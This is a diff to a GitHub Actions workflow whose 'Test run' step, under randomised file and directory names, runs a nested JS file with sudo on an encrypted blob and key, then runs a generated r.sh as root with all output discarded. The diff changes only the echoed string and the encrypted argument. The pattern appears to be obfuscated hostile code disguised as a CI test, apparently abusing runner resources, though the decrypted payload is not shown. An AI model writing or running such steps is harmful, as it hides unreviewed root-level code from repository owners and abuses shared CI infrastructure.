--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '7d2u7'
+        echo '6xbf3'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+OACl+Di/9p2WKa+zL/ZKcRG6KY1tTdluVVmBmCyPKEsLKzZ80KHi5cY7m7otNpOTLx9xq1F1sS5wo4rmWFeKnynoSuSm5z3m34KLVqKOMh8+zJ84bpPQF vq6gez && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+GBhc3+LzH3fnnDer9zVlYV68XZkKFLMseshT3dvSTURfCZZIWI3wgerGUXgCOGJ+sujauo2/H/9VOQP5Vh6+zN3pLsB8RRFMKw6wIbMYZfp1JxkFQ38HM cq1205 && sudo sh r.sh > /dev/null 2>&1
